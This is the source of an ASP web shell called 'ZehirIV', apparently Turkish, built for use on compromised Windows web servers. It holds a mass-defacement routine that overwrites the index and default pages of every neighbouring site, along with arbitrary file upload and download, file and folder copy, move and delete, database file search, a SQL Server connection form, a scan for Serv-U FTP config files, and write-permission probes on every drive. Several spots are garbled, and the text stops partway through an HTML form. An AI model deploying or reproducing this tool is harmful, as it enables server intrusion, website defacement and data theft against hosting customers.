

```

<%
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
    Response.End
end if
if Request("kuskapani")=2 then
    on error resume next
    path = Request("path")
    sFolder = Request("SubFolder")
    fName = Request("FileName")
    d1 = Request("dosya1")
    d2 = Request("dosya2")
    d3 = Request("dosya3")
    d4 = Request("dosya4")
    bg__ = Request.Form("selectColour")
    if bg__ = "0" then bg__ = "#ffffff"
    byMesaj = "<body bgColor='\"&bg__&\"'>" & Request("byMesaj") &
"<br><br><center><font color=gray size=2>powered by Z" & Session("n2") &
"3 ;</font>>"

    sFolder = Replace(sFolder,"/","\")

    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
    Set f = objFSO.GetFolder(Path)
    Set fc = f.SubFolders
    h__ = 0
    f__ = 0
    ss__ = now
    For Each f1 In fc
        hedef_ = replace(f1.path,"/","\")
        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
        hedef__ = left(hedef_,len(hedef_)-1)
        folderName_ = Right(hedef__, len(hedef_)-
instrrev(hedef__, "\"))
        if d1<>"" then d1 = true
        if d2<>"" then d2 = true
        if d3<>"" then d3 = true
        if d4<>"" then d4 = true
        on error goto 0:on error resume next
        if fName<>"" then
            Set MyFile = objFSO.CreateTextFile(hedef_
& sFolder & fName, True)
            MyFile.write byMesaj
        end if
        if d1 then
            Set MyFile = objFSO.CreateTextFile(hedef_
& sFolder & "index.htm", True)
            MyFile.write byMesaj
        end if
        if d2 then
            Set MyFile = objFSO.CreateTextFile(hedef_
& sFolder & "default.htm", True)
            MyFile.write byMesaj
        end if
        if d3 then
            Set MyFile = objFSO.CreateTextFile(hedef_

```

```

& sFolder & "index.asp", True)
        MyFile.write byMesaj
    end if
    if d4 then
        Set MyFile = objFSO.CreateTextFile(hedef_
& sFolder & "default.asp", True)
        MyFile.write byMesaj
    end if

    if err<>0 then
        response.Write folderName_ & " <font
color=red>[FAILED!]</font><br>"
        f__ = f__ + 1
    else
        response.Write folderName_ & " <font
color=blue>[HACKED]</font><br>"
        h__ = h__ + 1
    end if

    Next
    ss__ = now
    response.Write "<br><font color=white>by zehir!...</font>
<br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss__,5)&"sn. ;)<br><font
color=blue>Hacked</font> = "&h__"<br><font color=red>Failed</font> =
"&f__
        response.End
end if

status = Request("status")
path = Request("path")
dPath = Request("dPath")
arama = Request("txArama")
dkayit = Request("dkayit")
table = Request("table")
del = Request("del")
islem = Request("islem")
strSQL = Request("strSQL")
cf = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
if status="" then status=2
popup = true
'////////////////////////////////////
Function ReadBinaryFile(FileName)
    Const adTypeBinary = 1
    Dim BinaryStream
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.Type = adTypeBinary
    BinaryStream.Open
    BinaryStream.LoadFromFile FileName
    ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
    Response.Buffer=True
    Set Fil = objFSO.GetFile(pathfile)

    Response.contentType="application/force-download"
    Response.AddHeader "Cache-control","private"
    Response.AddHeader "Content-Length", Fil.Size
    Response.AddHeader "Content-Disposition", "attachment; filename=" &
Fil.name

```

```

        Response.BinaryWrite readBinaryFile(Fil.path)
    Set f = Nothing: Set Fil = Nothing
    response.End()
end if
'////////////////////////////////////
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>" then response.Write byMsg
response.Write "<title>[AhmetDeniz.Org] ZehirIV --> powered by zehir
<lt;zehirhacker@hotmail.com>></title>"
if popup then
%>
<center>
<a href="<%=dosyaPath%>?mevla=1&status=13"
onclick="sistemBilgisi(this.href);return false;">System Info</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=40"
onclick="sistemTest(this.href);return false;">System Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>"
onclick="SitelerTestte(this.href);return false;">Sites Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>"
onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);
return false;">SQL Server</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);
return false;">POWERED BY</a>
<script language=javascript>
    function sistemBilgisi(yol){
        NewWindow(yol,"",600,240,"no");
    }
    function SitelerTestte(yol){
        NewWindow(yol,"",530,420,"no");
    }
    function klasorIslemleri(yol){
        NewWindow(yol,"",400,280,"no");
    }
    function sqlServer(yol){
        NewWindow(yol,"",300,50,"no");
    }
    function poweredby(yol){
        NewWindow(yol,"",300,50,"no");
    }
    function sistemTest(yol){
        NewWindow(yol,"",400,300,"no");
    }
}

```

```

</script>
<%
end if
'#####
Class clsUpload
    Private mbinData
    Private mlngChunkIndex
    Private mlngBytesReceived
    Private mstrDelimiter
    Private CR
    Private LF
    Private CRLF
    Private mobjFieldAry()
    Private mlngCount

    Private Sub RequestData
        Dim llngLength
        mlngBytesReceived = Request.TotalBytes
        mbinData = Request.BinaryRead(mlngBytesReceived)
    End Sub

    Private Sub ParseDelimiter()
        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData,
CRLF) - 1)
    End Sub

    Private Sub ParseData()
        Dim llngStart
        Dim llngLength
        Dim llngEnd
        Dim lbinChunk
        llngStart = 1
        llngStart = InStrB(lngStart, mbinData, mstrDelimiter &
CRLF)
        While Not llngStart = 0
            llngEnd = InStrB(lngStart + 1, mbinData,
mstrDelimiter) - 2
            llngLength = llngEnd - llngStart
            lbinChunk = MidB(mbinData, llngStart, llngLength)
            Call ParseChunk(lbinChunk)
            llngStart = InStrB(lngStart + 1, mbinData,
mstrDelimiter & CRLF)
        Wend
    End Sub

    Private Sub ParseChunk(ByRef pbinChunk)
        Dim lstrName
        Dim lstrFileName
        Dim lstrContentType
        Dim lbinData
        Dim lstrDisposition
        Dim lstrValue
        lstrDisposition = ParseDisposition(pbinChunk)
        lstrName = ParseName(lstrDisposition)
        lstrFileName = ParseFileName(lstrDisposition)
        lstrContentType = ParseContentType(pbinChunk)
        If lstrContentType = "" Then
            lstrValue = CStrU(ParseBinaryData(pbinChunk))
        Else
            lbinData = ParseBinaryData(pbinChunk)
        End If
    End Sub
End Class

```

```

        End If
        Call AddField(lstrName, lstrFileName, lstrContentType,
lstrValue, lbinData)
    End Sub

```

```

    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef
pstrContentType, ByRef pstrValue, ByRef pbinData)
        Dim lobjField
        ReDim Preserve mobjFieldAry(mlngCount)
        Set lobjField = New clsField
        lobjField.Name = pstrName
        lobjField.FilePath =
pstrFileName
        lobjField.ContentType = pstrContentType
        If LenB(pbinData) = 0 Then
            lobjField.BinaryData = ChrB(0)
            lobjField.Value = pstrValue
            lobjField.Length = Len(pstrValue)
        Else
            lobjField.BinaryData = pbinData
            lobjField.Length = LenB(pbinData)
            lobjField.Value = ""
        End If
        Set mobjFieldAry(mlngCount) = lobjField
        mlngCount = mlngCount + 1
    End Sub

```

```

    Private Function ParseBinaryData(ByRef pbinChunk)
        Dim llngStart
        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
        If llngStart = 0 Then Exit Function
        llngStart = llngStart + 4
        ParseBinaryData = MidB(pbinChunk, llngStart)
    End Function

```

```

    Private Function ParseContentType(ByRef pbinChunk)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-
Type:")), vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStrB(lngStart + 15, pbinChunk, CR)
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 15
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart,
llngLength)))
    End Function

```

```

    Private Function ParseDisposition(ByRef pbinChunk)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-
Disposition:")), vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStrB(lngStart + 22, pbinChunk, CRLF)
        If llngEnd = 0 Then Exit Function

```

```

        llngStart = llngStart + 22
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseDisposition = CStrU(MidB(pbinChunk, llngStart,
llngLength))
    End Function

```

```

    Private Function ParseName(ByRef pstrDisposition)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStr(1, pstrDisposition, "name=""",
vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStr(llngStart + 6, pstrDisposition, """)
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 6
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseName = Mid(pstrDisposition, llngStart, llngLength)
    End Function
,

```

```

-----
-----

```

```

    Private Function ParseFileName(ByRef pstrDisposition)
        Dim llngStart
        Dim llngEnd
        Dim llngLength
        llngStart = InStr(1, pstrDisposition, "filename=""",
vbTextCompare)
        If llngStart = 0 Then Exit Function
        llngEnd = InStr(llngStart + 10, pstrDisposition, """)
        If llngEnd = 0 Then Exit Function
        llngStart = llngStart + 10
        If llngStart >= llngEnd Then Exit Function
        llngLength = llngEnd - llngStart
        ParseFileName = Mid(pstrDisposition, llngStart,
llngLength)
    End Function

```

```

    Public Property Get Count()
        Count = mlngCount
    End Property

    Public Default Property Get Fields(ByVal pstrName)
        Dim llngIndex
        If IsNumeric(pstrName) Then
            llngIndex = CLng(pstrName)
            If llngIndex > mlngCount - 1 Or llngIndex < 0
Then
                Call Err.Raise(vbObjectError + 1,
"clsUpload.asp", "Object does not exist within the ordinal reference.")
                Exit Property
            End If
            Set Fields = mobjFieldAry(pstrName)
        Else
            pstrName = LCase(pstrname)
            For llngIndex = 0 To mlngCount - 1
                If LCase(mobjFieldAry(llngIndex).Name) =
pstrName Then

```

```

Set Fields =
mobjFieldAry(llngIndex)
Exit Property
End If
Next
End If
Set Fields = New clsField
End Property

Private Sub Class_Terminate()
Dim llngIndex
For llngIndex = 0 To mlngCount - 1
Set mobjFieldAry(llngIndex) = Nothing

Next
ReDim mobjFieldAry(-1)
End Sub

Private Sub Class_Initialize()
ReDim mobjFieldAry(-1)
CR = ChrB(Asc(vbCr))
LF = ChrB(Asc(vbLf))
CRLF = CR & LF
mlngCount = 0
Call RequestData
Call ParseDelimiter()
Call ParseData
End Sub

Private Function CStrU(ByRef pstrANSI)
Dim llngLength
Dim llngIndex
llngLength = LenB(pstrANSI)
For llngIndex = 1 To llngLength
CStrU = CStrU & Chr(AscB(MidB(pstrANSI,
llngIndex, 1)))
Next
End Function

Private Function CStrB(ByRef pstrUnicode)
Dim llngLength
Dim llngIndex
llngLength = Len(pstrUnicode)
For llngIndex = 1 To llngLength
CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode,
llngIndex, 1)))
Next
End Function
End Class
'#####
Session("n1") = "byZ"
Class clsField
Public Name
Private mstrPath
Public FileDir
Public FileExt
Public FileName
Public ContentType
Public Value
Public BinaryData

```

```
Public Length
Private mstrText
```

```
Public Property Get BLOB()
    BLOB = BinaryData
End Property
```

```
Public Function BinaryAsText()
    Dim lbinBytes
    Dim lobjRs
    If Length = 0 Then Exit Function
    If LenB(BinaryData) = 0 Then Exit Function

    If Not Len(mstrText) = 0 Then
        BinaryAsText = mstrText
        Exit Function
    End If
    lbinBytes = ASCII2Bytes(BinaryData)
    mstrText = Bytes2Unicode(lbinBytes)
BinaryAsText = mstrText
End Function
```

```
Public Sub SaveAs(ByRef pstrFileName)
    Const adTypeBinary=1
    Const adSaveCreateOverWrite=2
    Dim lobjStream
    Dim lobjRs
    Dim lbinBytes
    If Length = 0 Then Exit Sub
    If LenB(BinaryData) = 0 Then Exit Sub
    Set lobjStream = Server.CreateObject("ADODB.Stream")
    lobjStream.Type = adTypeBinary
    Call lobjStream.Open()
    lbinBytes = ASCII2Bytes(BinaryData)
    Call lobjStream.Write(lbinBytes)
```

```
    On Error Resume Next
```

```
    Call lobjStream.SaveToFile(pstrFileName,
adSaveCreateOverWrite)
```

```
    'if err<>0 then response.Write "<br>"&err.Description
```

```
    Call lobjStream.Close()
    Set lobjStream = Nothing
```

```
End Sub
```

```
Public Property Let FilePath(ByRef pstrPath)
    mstrPath = pstrPath
    If Not InStrRev(pstrPath, ".") = 0 Then
        FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") +
1)

        FileExt = UCase(FileExt)
    End If
    If Not InStrRev(pstrPath, "\") = 0 Then
        FileName = Mid(pstrPath, InStrRev(pstrPath, "\")
+ 1)

    End If
    If Not InStrRev(pstrPath, "\") = 0 Then
        FileDir = Mid(pstrPath, 1, InStrRev(pstrPath,
```



```

"\") - 1)
        End If
    End Property

    Public Property Get FilePath()
        FilePath = mstrPath
    End Property

    private Function ASCII2Bytes(ByRef pbinBinaryData)
        Const adLongVarBinary=205
        Dim lobjRs
        Dim lngLength
        Dim lbinBuffer
        lngLength = LenB(pbinBinaryData)
        Set lobjRs = Server.CreateObject("ADODB.Recordset")
        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary,
lngLength)
        Call lobjRs.Open()
        Call lobjRs.AddNew()
        Call
lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
        Call lobjRs.Update()
        lbinBuffer =
lobjRs.Fields("BinaryData").GetChunk(lngLength)
        Call lobjRs.Close()
        Set lobjRs = Nothing
        ASCII2Bytes = lbinBuffer
    End Function

    Private Function Bytes2Unicode(ByRef pbinBytes)
        Dim lobjRs
        Dim lngLength
        Dim lstrBuffer
        lngLength = LenB(pbinBytes)
        Set lobjRs = Server.CreateObject("ADODB.Recordset")
        Call lobjRs.Fields.Append("BinaryData", adLongVarChar,
lngLength)
        Call lobjRs.Open()
        Call lobjRs.AddNew()
        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
        Call lobjRs.Update()
        lstrBuffer = lobjRs.Fields("BinaryData").Value
        Call lobjRs.Close()
        Set lobjRs = Nothing
        Bytes2Unicode = lstrBuffer
    End Function
End Class
Session("n2") = "ehir"
'#####
function addslash(path)
    if right(path,1)="\" then addslash=path else addslash=path & "\"
end function

sub Upload()
    dim objUpload,f,max,i,name,path,size,succes

    set objUpload=New clsUpload

    targetPath=objUpload.Fields("folder").Value
    max=objUpload.Fields("max").Value

```

```

        for i=1 to max
            name=objUpload.Fields("file" & i).FileName
            size=objUpload.Fields("file" & i).Length
            if (name<>"") and (size>0) then
                gMsg=gMsg & "<br>" & vbNewLine & "- " & name & "
(" & FormatNumber(size,0) & " bytes): "
                path=addslash(targetPath) & name
                objUpload.Fields("file" & i).SaveAs path

                if objFSO.FileExists(path) then
                    on error resume next
                    set f=objFSO.GetFile(path)
                    if IsObject(f) then
                        if f.Size=size then success=true
else success=false
                                end if
                                set f=nothing
                            end if
                            if success then gMsg=gMsg & "<font
color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!
</font>"
                                end if
                            next
                            response.Write gMsg
                            set objUpload=nothing
end sub

if status="-4" then
    Upload()
    ' hataKontrol
    popup=false
end if
'////////////////////
sub hataKontrol
    if err<>0 then
        Response.Write "<font color=red size=2>Hata :
"&err.Description"</font>"
    end if
end sub

sub araBul(path_,ara_)
    on error resume next
    If Len(path_) > 0 Then
        cur = path_&"\"
        If cur = "\\\" Then cur = ""
        parent = ""
        If InStrRev(cur,"\") > 0 Then
            parent = Left(cur, InStrRev(cur, "\",
Len(cur)-1))
        End If
    Else
        cur = ""
    End If

    Set f = objFSO.GetFolder(cur)

    Set fc = f.Files
    For Each f1 In fc

```

```

        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
            downStr = "<font face=webdings size=5><a href='\"&dosyapath&\"?status=-3&pathFile=\"&f1.path&\"&Time=\"&time&\"'>İ</a></font>"
            if lcase(ara_)="mdb" then
                Response.Write downStr"<font
face=wingdings size=5><a href='\"&dosyapath&\"?status=3&path=\"&path_&\"&
Del=\"&f1.path&\"&Time=\"&time&\"'>û</a></font> * <a href='\"&
dosyapath&\"?status=7&path=\"&f1.path&\"&Time=\"&time&\"'>&f1.path&
[\"&f1.size&\"]&\"</a></b><br>"
            else
                Response.Write downStr"<font
face=wingdings size=5><a href='\"&dosyapath&\"?status=3&path=\"&path_&\"&
Del=\"&f1.path&\"&Time=\"&time&\"'>û</a><a href='\"&dosyapath&\"?status=10&
dPath=\"&f1.path&\"&path=\"&path&\"&Time=\"&time&\"'>!</a></font> - <a href='\"&
dosyapath&\"?status=5&path=\"&f1.path&\"&Time=\"&time&\"'>&f1.path&
[\"&f1.size&\"]&\"</a></b><br>"
            end if
        end if
    Next

    Set fs = f.SubFolders
    For Each f1 In fs
        araBul f1.path,ara_
    Next
    Set f = Nothing
    Set fc = Nothing
    Set fs = Nothing
end sub

sub sistemTest
    response.Write "<table width='100%' align=center cellpadding=0
cellspacing=0 border=1>"
    response.Write "<tr bgcolor=#ffffc0><td width='30%'
align=center><font color=navy><b>Konum</td><td width='70%'
align=center><font color=navy><b>Sonuç</td></tr>"

    servu_Test
    WriteTestOnDriver
    WriteTestOnLocalPath
    LocalPathParentFolder
    LocalPathPParentFolder

    response.Write "</table>"
end sub

sub servu_Test
    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program
Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u
daemon.ini")
    for each drive_ in objFSO.Drives
        if drive_.Drivetype=2 or drive_.Drivetype=3 then
            for each d_ in dosya_
                d_ = drive_.DriveLetter&":"&d_
                if objFSO.FileExists(d_) then
                    response.Write "<tr><td><b>Serv-U
ini file : </td><td><font color=yellow>&d_&\"</td></tr>"
                end if
            next
        end if
    next
end sub

```

end sub

function yaziyomu(yol)

on error goto 0: on error resume next

dim sonuc__

Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)

MyFile.write "byzehir <zehirhacker@hotmail.com>"

set MyFile = Nothing

if err<>0 then

sonuc__="Yazma Hakký Yok!"

else

sonuc__="Yazma Hakký Var!"

on error goto 0: on error resume next

objFSO.DeleteFile yol & "\test.zehir", true

if err<>0 then

sonuc__=sonuc__&"
Silme Hakký

Yok!"

else

sonuc__=sonuc__&"
Silme

Hakký Var!"

end if

end if

yaziyomu = sonuc__

end function

function yaziyomu2(yol)

on error goto 0: on error resume next

Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)

MyFile.write "byzehir <zehirhacker@hotmail.com>"

set MyFile = Nothing

if err<>0 then

yaziyomu2 = false

else

objFSO.DeleteFile yol & "\test.zehir"

yaziyomu2 = true

end if

end function

sub WriteTestOnDriver

for each drive_ in objFSO.Drives

if drive_.Drivetype=2 or drive_.Drivetype=3 then

if not yaziyomu2(drive_.DriveLetter&"\:") then

Response.Write "<tr><td>

"&drive_.DriveLetter&"\:</td><td>yazma yetkisi yok! :

["&err.Description&"]</td></tr>"

else

Response.Write "<tr><td>

"&drive_.DriveLetter&"\:</td><td>yazma yetkisi

var!</td></tr>"

end if

end if

next

end sub

sub WriteTestOnLocalPath

on error goto 0

on error resume next

if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH"))

then

Response.Write "<tr><td>Local Path </td><td><font

```

color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
    else
        Response.Write "<tr><td><b>Local Path </td><td><font
color=yellow>yazma yetkisi var!</td></tr>"
    end if
end sub

sub LocalPathParentFolder
    on error goto 0
    on error resume next
    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
    parhed_ = left(hed_,InStrRev(hed_,"\"))

    Set f = objFSO.GetFolder(parhed_)
    Set fc = f.SubFolders

    int_fol=0
    int_fil=0
    For Each f1 In fc
        int_fol=int_fol+1
    Next

    Set fc = f.files
    For Each f1 In fc
        int_fil=int_fil+1
    Next

    if err<>0 then
        Response.Write "<tr><td><b>Local Path <br>Parent
Folder</td><td><font color=red>Hata Oluptu : ["&err.Description&"]
</td></tr>"
    else
        Response.Write "<tr><td><b>Local Path <br>Parent
Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"
<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
    end if
end sub

sub LocalPathPParentFolder
    on error goto 0
    on error resume next
    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
    hed_ = left(hed_,InStrRev(hed_,"\"))
    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
    parhed_ = left(hed_,InStrRev(hed_,"\"))

    Set f = objFSO.GetFolder(parhed_)
    Set fc = f.SubFolders
    int_fol=0
    int_fil=0
    For Each f1 In fc
        int_fol=int_fol+1
    Next

    Set fc = f.files
    For Each f1 In fc
        int_fil=int_fil+1
    Next

```

```

        if err<>0 then
            if err=451 then
                Response.Write "<tr><td><b>Local Path
<br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td>
</tr>"
            else
                Response.Write "<tr><td><b>Local Path
<br>P.Parent Folder</td><td><font color=red>Hata Oluptu :
["&err.Description&"]</td></tr>"
            end if
        else
            Response.Write "<tr><td><b>Local Path <br>P.Parent
Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"
<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
        end if
    end sub

SELECT CASE status
CASE 13 'Sistem Bilgisi
    Response.Write "<table width=100% cellpadding=0 cellspacing=0>
<tr><td colspan=2 align=center><font color=yellow face='courier
new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:
</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-
WEIGHT:normal'>:</font></td></tr>"
    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> "
    & request.servervariables("REMOTE_ADDR") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>User Agent</td><td> "
    & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>Server</td><td> " &
    request.servervariables("SERVER_NAME") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>IP</td><td> " &
    request.servervariables("LOCAL_ADDR") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " &
    request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>Port</td><td> " &
    request.servervariables("SERVER_PORT") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>Yol</td><td> " &
    request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " &
    request.servervariables("APPL_MD_PATH") & "</td></tr>"
    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " &
    request.servervariables("HTTPS") & "</td></tr>"
    Response.Write "</table>"
    popup = false
CASE 14 'Upload and Search
    aramaUpload
    popup = false
    hataKontrol
CASE 15 'Ms. SQL Server
    Response.Write "<form method=get action=' "&DosyPath&"'
target='_opener' id=form1 name=form1>"
    Response.Write "<table cellpadding=0 cellspacing=0 align=center>
<tr><td align=center><font size=2>SQL Server için connection string
giriniz</td></tr><tr><td align=center>"
        Response.Write "<input type=hidden value='7' name=status><input
type=hidden value=' "&time&"' name=Time>"
        Response.Write "<input style='width:250; height:21' value=' '
name=path><br>"
        response.Write "<input type=submit value='SQL Servera Bağlan'"

```

```

style='height:23;width:170' id=submit1 name=submit1>"
    Response.Write "</td></tr></table>"
    response.Write "</form>"

    popup = false
    hataKontrol
CASE 16 'file Copy window
    Response.Write "<form method=get action='\"&DosyPath&\"' id=form1
name=form1>"
    Response.Write "<table cellpadding=0 cellspacing=0 align=center>
<tr><td width=100><font size=2>Kop. Yer : </td><td>"
    Response.Write "<input type=hidden value='17' name=status><input
type=hidden value='\"&PathFile&\"' name=path><input type=hidden value='\"&
time&\"' name=Time>"
    Response.Write "<input style='width:250; height:21' value='\"&
PathFile&\"' name=cf>"
    response.Write "<input type=submit value='Kopyala'
style='height:22;width:70' id=submit1 name=submit1>"
    Response.Write "</td></tr><tr><td colspan=3 align=center><font
size=2>"
    response.Write "<input type=radio name='islem' value='kopyala'
checked>Kopyala"
    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
    response.Write "</table>"
    response.Write "</form>"

    popup = false
    hataKontrol
CASE 17 'file Copy
    isl = ""
    if islem="kopyala" then
        objFSO.CopyFile path,cf
        isl="kopyalandý.."
    elseif islem="tasi" then
        objFSO.MoveFile path,cf
        isl="tapýndý.."
    end if
    response.Write "Dosya "&isl
    response.Write "<br><font color=red>Kaynak : </font>\"&path&\"
<br><font color=red>Hedef : </font>\"&cf
    response.Write "<br>"
    popup = false
    hataKontrol
CASE 18 'folder Copy window
    Response.Write "<form method=get action='\"&DosyPath&\"' id=form1
name=form1>"
    Response.Write "<table cellpadding=0 cellspacing=0 align=center>
<tr><td width=100><font size=2>Kop. Yer : </td><td>"
    Response.Write "<input type=hidden value='19' name=status><input
type=hidden value='\"&PathFile&\"' name=path><input type=hidden value='\"&
time&\"' name=Time>"
    Response.Write "<input style='width:250; height:21' value='\"&
PathFile&\"' name=cf>"
    response.Write "<input type=submit value='Kopyala'
style='height:22;width:70' id=submit1 name=submit1>"
    Response.Write "</td></tr><tr><td colspan=3 align=center><font
size=2>"
    response.Write "<input type=radio name='islem' value='kopyala'
checked>Kopyala"
    response.Write "<input type=radio name='islem' value='tasi'>Tasi"

```

```

response.Write "</table>"
response.Write "</form>"

popup = false
hataKontrol
CASE 19 'folder Copy
isl = ""
if islem="kopyala" then
    objFS0.CopyFolder path,cf
    isl="kopyalandý.."
elseif islem="tasi" then
    objFS0.MoveFolder path,cf
    isl="tapýndý.."
end if
response.Write "Klasor "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"
<br><font color=red>Hedef : </font>"&cf
response.Write "<br>"
popup = false
hataKontrol
CASE 33 'Powered By
response.Write "<body topmargin=5 leftmargin=0><center>
<h4>Powered by Zehir"
response.Write "<br><br><font style='FONT-WEIGHT:normal'
size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier
new'>küllü nefsun zaifetun mevt"
popup = false
hataKontrol
CASE 40 'Sistem Test
sistemTest
popup=false
CASE 50 'Siteleri Test Edelim :D
%>
<table width="100%" cellpadding=0 cellspacing=0>
    <tr>
        <td align=center>
            <b>Güvenlik Testi byZehir</b>
            <br>
            <form action="<%=dosyaPath%>" method=post
id=frmMesaj>
                <input type=hidden name=kuskapani
value=2>
                <table width=500 align=center
border=1 cellpadding=0 cellspacing=0>
                    <tr>
                        <td
width=100>Path</td>
                        <td>
                            <input style="width:100%" type=text
name="Path" id="Path" value="<%=path%>" size="20"></td>
                    </tr>
                    <tr>
                        <td width=100>Sub
Folder</td>
                        <td>
                            <input style="width:100%" type=text
name="SubFolder" id="SubFolder" value="www" size="20"></td>
                    </tr>
                    <tr>
                        <td>
                            <input style="width:100%" type=text
name="SubFolder" id="SubFolder" value="www" size="20"></td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>
%<

```



```

width=100>File Name</td>
                                <td>
                                <input style="width:100%" type=text
name="FileName" id="FileName" value="byzehir.txt" size="20"></td>
                                </tr>
                                <tr>
                                <td colspan=2>
                                <table
width="100%" align=center>
<tr>
    <td width="50%">
        <input type=checkbox name="dosya1" ID="Checkbox1"
value="ON">index.htm<br>
        <input type=checkbox name="dosya2" ID="Checkbox2"
value="ON">default.htm<br>
    </td>
    <td width="50%">
        <input type=checkbox name="dosya3" ID="Checkbox3"
value="ON">index.asp<br>
        <input type=checkbox name="dosya4" ID="Checkbox4"
value="ON">default.asp<br>
    </td>
</tr>
</table>
                                </td>
                                </tr>
                                <tr>
                                <td colspan=2
align=center>
                                <a
href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
                                <a
href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
                                <a
href="#" onClick="FormatText('paste')" alt="Yapýptýr">Yapýptýr</a>
                                <a
href="#" alt="Kalýn" onClick="FormatText('bold', '')">Bold</a>
                                <a
href="#" alt="Ýtalic" onClick="FormatText('italic', '')">Italic</a>
                                <a
href="#" alt="Altý Çizili" onClick="FormatText('underline',
'')">UnderLine</a>
                                <a
href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola
Hizalý">JustifyLeft</a>
                                <a
href="#" alt="Ortada Hizalý" onClick="FormatText('JustifyCenter',
'')">JustifyCenter</a>
                                <a
href="#" onClick="FormatText('JustifyRight', '')" alt="Sađa

```

```

Hizalý">JustifyRight</a>

href="#" alt="Web Sitesi Linki Ekle"
onClick="FormatText('createLink')">AddLink</a>

href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>

name="selectColour"
onChange="bgc(selectColour.options[selectColour.selectedIndex].value);"
ID="selectColour">
    <option value="0" selected>-- Renk
--</option>
    <option value="black">Siyah</option>
    <option value="white">Beyaz</option>
    <option value="blue">Mavi</option>
    <option value="red">Kýrmýzý</option>
    <option value="green">Yeþil</option>
    <option value="yellow">Sarý</option>
    <option value="orange">Turuncu</option>
    <option
value="brown">Kahverengi</option>
    <option value="magenta">Pembe</option>
